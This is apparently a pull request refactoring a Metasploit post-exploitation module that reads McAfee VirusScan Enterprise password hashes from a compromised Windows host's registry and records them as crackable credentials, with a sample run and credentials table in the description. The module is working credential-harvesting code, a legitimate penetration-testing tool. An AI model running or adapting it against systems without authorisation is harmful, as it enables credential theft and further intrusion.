### PR TITLE
Ruby/Metasploit style cleanup of McAfee hashdump module

### DIFF
--- a/modules/post/windows/gather/credentials/mcafee_hashdump.rb
+++ b/modules/post/windows/gather/credentials/mcafee_hashdump.rb
@@ -13,6 +13,11 @@ class Metasploit3 < Msf::Post
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
 
+  VERSION_5 = Gem::Version.new('5.0')
+  VERSION_6 = Gem::Version.new('6.0')
+  VERSION_8 = Gem::Version.new('8.0')
+  VERSION_9 = Gem::Version.new('9.0')
+
   def initialize(info = {})
     super(update_info(
       info,
@@ -32,35 +37,52 @@ class Metasploit3 < Msf::Post
   end
 
   def enum_vse_keys
-    subkeys = []
+    vprint_status('Enumerating McAfee VSE installations')
+    keys = []
     [
       'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
       'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
     ].each do |key|
-      subkeys |= registry_enumkeys(key)
+      subkeys = registry_enumkeys(key)
+      keys << key unless subkeys.empty?
     end
-    subkeys.compact
+    keys
   end
 
-  def extract_hashes(keys)
+  def extract_hashes_and_versions(keys)
+    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
+    hash_map =  {}
     keys.each do |key|
       hash = registry_getvaldata(key, "UIPEx")
       if hash.empty?
         vprint_error("No McAfee password hash found in #{key}")
-        return
+        next
       end
 
-      # Base64 decode mcafee_hash
-      mcafee_version = registry_getvaldata(key, "szProductVer")
-      if mcafee_version.split(".")[0] == "8"
-        mcafee_hash =  Rex::Text.to_hex(Rex::Text.decode_base64(mcafee_hash), "")
-        print_good("McAfee v8 password hash => #{mcafee_hash}")
-        hashtype = "dynamic_1405"
-      elsif mcafee_version.split(".")[0] == "5"
-        print_good("McAfee v5 password hash => #{mcafee_hash}")
-        hashtype = "md5u"
+      version = registry_getvaldata(key, "szProductVer")
+      if version.empty?
+        vprint_error("No McAfee version key found in #{key}")
+        next
+      end
+      hash_map[hash] = Gem::Version.new(version)
+    end
+    hash_map
+  end
+
+  def process_hashes_and_versions(hashes_and_versions)
+    hashes_and_versions.each do |hash, version|
+      if version >= VERSION_8 && version < VERSION_9
+        # Base64 decode hash
+        hash =  Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
+      elsif version >= VERSION_5 && version < VERSION_6
+        print_good("McAfee v5 password hash: #{hash}")
+        hashtype = 'md5u'
       else
-        print_status("Could not identify the version of McAfee - Assuming v8")
+        print_warning("Could not identify the version of McAfee - Assuming v8")
+        print_good("McAfee v8 password hash: #{hash}")
+        hashtype = 'dynamic_1405'
       end
 
       # report
@@ -77,7 +99,7 @@ class Metasploit3 < Msf::Post
         post_reference_name: refname,
         origin_type: :session,
         private_type: :password,
-        private_data: mcafee_hash,
+        private_data: hash,
         session_id: session_db_id,
         jtr_format: hashtype,
         workspace_id: myworkspace_id,
@@ -102,14 +124,19 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    print_status("Checking McAfee password hash on #{sysinfo['Computer']} ...")
+    print_status("Looking for McAfee password hashes on #{sysinfo['Computer']} ...")
 
     vse_keys = enum_vse_keys
     if vse_keys.empty?
-      print_error("McAfee Virus Scan Enterprise not installed or insufficient permissions")
+      vprint_error("McAfee Virus Scan Enterprise not installed or insufficient permissions")
       return
     end
 
-    extract_hashes(vse_keys)
+    hashes_and_versions = extract_hashes_and_versions(vse_keys)
+    if hashes_and_versions.empty?
+      vprint_error("No hashes extracted")
+      return
+    end
+    process_hashes_and_versions(hashes_and_versions)
   end
 end

--- a/modules/post/windows/gather/credentials/mcafee_hashdump.rb
+++ b/modules/post/windows/gather/credentials/mcafee_hashdump.rb
@@ -9,98 +9,107 @@ require 'msf/core/auxiliary/report'
 require 'rex/proto/rfb'
 
 class Metasploit3 < Msf::Post
-
   include Msf::Post::Windows::Registry
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'McAfee Virus Scan Enterprise Password Hashes Dump',
-        'Description'   => %q{ This module extracts the password
-        hash from McAfee Virus Scan Enterprise used to lock down the user interface.
-        Credits: Maurizio inode Agazzini},
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Mike Manzotti <michelemanzotti[at]gmail.com>'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
-      ))
-
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'          => 'McAfee Virus Scan Enterprise Password Hashes Dump',
+      'Description'   => %q(
+        This module extracts the password hash from McAfee Virus Scan
+        Enterprise used to lock down the user interface.
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+        'Mike Manzotti <michelemanzotti[at]gmail.com>', # Metasploit module?
+        'Maurizio inode Agazzini' # original research?
+      ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
   end
 
-  def run
-    print_status("Checking McAfee password hash on #{sysinfo['Computer']} ...")
-	
-	# Checking if McAfee 64bit can be found in the registry keys
-	check_reg = 'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection'
-	subkeys = registry_enumkeys(check_reg)
-    if subkeys.nil? or subkeys.empty?
-	   
-	  # Checking for McAfee 32bit
-	  check_reg = 'HKLM\\Software\\McAfee\\DesktopProtection'
-	  subkeys = registry_enumkeys(check_reg)
-	  if subkeys.nil? or subkeys.empty?
-        print_error ("McAfee Not Installed or No Permissions to RegKey")
+  def enum_vse_keys
+    subkeys = []
+    [
+      'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
+      'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
+    ].each do |key|
+      subkeys |= registry_enumkeys(key)
+    end
+    subkeys.compact
+  end
+
+  def extract_hashes(keys)
+    keys.each do |key|
+      hash = registry_getvaldata(key, "UIPEx")
+      if hash.empty?
+        vprint_error("No McAfee password hash found in #{key}")
         return
       end
-	end
-	
-	mcafee_hash = registry_getvaldata(check_reg, "UIPEx")
-	if mcafee_hash == nil or mcafee_hash == ""
-      print_error ("Could not find McAfee password hash")
-      return
-	else
-	  #Base64 decode mcafee_hash
-	  mcafee_version = registry_getvaldata(check_reg, "szProductVer")
-	  if mcafee_version.split(".")[0] == "8"
-		  mcafee_hash =  Rex::Text.to_hex(Rex::Text.decode_base64(mcafee_hash),"")
-		  print_good("McAfee v8 password hash => #{mcafee_hash}");
-		  hashtype = "dynamic_1405"
-	  elsif mcafee_version.split(".")[0] == "5"
-		  print_good("McAfee v5 password hash => #{mcafee_hash}");
-		  hashtype = "md5u"
-	  else	  
-		print_status("Could not identify the version of McAfee - Assuming v8")
-	  end
-		
-	
-	  # report
+
+      # Base64 decode mcafee_hash
+      mcafee_version = registry_getvaldata(key, "szProductVer")
+      if mcafee_version.split(".")[0] == "8"
+        mcafee_hash =  Rex::Text.to_hex(Rex::Text.decode_base64(mcafee_hash), "")
+        print_good("McAfee v8 password hash => #{mcafee_hash}")
+        hashtype = "dynamic_1405"
+      elsif mcafee_version.split(".")[0] == "5"
+        print_good("McAfee v5 password hash => #{mcafee_hash}")
+        hashtype = "md5u"
+      else
+        print_status("Could not identify the version of McAfee - Assuming v8")
+      end
+
+      # report
       service_data = {
-         address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-         port: rport,
-         service_name: 'McAfee',
-         protocol: 'tcp',
-         workspace_id: myworkspace_id
+        address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+        port: rport,
+        service_name: 'McAfee',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
       }
-	  
+
       # Initialize Metasploit::Credential::Core object
       credential_data = {
-        post_reference_name: self.refname,
-	    origin_type: :session,
-		private_type: :password,
-		private_data: mcafee_hash,
-	    	session_id: session_db_id,
-		jtr_format: hashtype,
-		workspace_id: myworkspace_id,
-		username: "null"
-      }	  
-	  
+        post_reference_name: refname,
+        origin_type: :session,
+        private_type: :password,
+        private_data: mcafee_hash,
+        session_id: session_db_id,
+        jtr_format: hashtype,
+        workspace_id: myworkspace_id,
+        username: "null"
+      }
+
       # Merge the service data into the credential data
       credential_data.merge!(service_data)
-	  
+
       # Create the Metasploit::Credential::Core object
       credential_core = create_credential(credential_data)
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
-      login_data ={
-          core: credential_core,
-          status: Metasploit::Model::Login::Status::UNTRIED
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
       }
 
-       # Merge in the service data and create our Login
-       login_data.merge!(service_data)
-       login = create_credential_login(login_data)	  
-	  
+      # Merge in the service data and create our Login
+      create_credential_login(login_data.merge!(service_data))
     end
+  end
+
+  def run
+    print_status("Checking McAfee password hash on #{sysinfo['Computer']} ...")
+
+    vse_keys = enum_vse_keys
+    if vse_keys.empty?
+      print_error("McAfee Virus Scan Enterprise not installed or insufficient permissions")
+      return
+    end
+
+    extract_hashes(vse_keys)
   end
 end


### PR DESCRIPTION
This is a cleanup of what was submitted in #4503. 

If you could test this against your 8.x and 5.x instances that would be great.  Then land it here and it'll show up in #4503.

My testing against 8.8:

```
msf post(mcafee_hashdump) > run

[*] Looking for McAfee password hashes on MCAF-VSE-8-8 ...
[*] Enumerating McAfee VSE installations
[*] Attempting to extract hashes from 2 McAfee VSE installations
[+] McAfee v8 password hash: <hash>
[*] Post module execution completed

msf post(mcafee_hashdump) > creds
Credentials
===========

host        service            public         private                                   realm  private_type
----        -------            ------         -------                                   -----  ------------
10.4.28.79  445/tcp (smb)      administrator  fff                                      Password
10.4.28.79  4444/tcp (McAfee)  null          <hash>        Password
```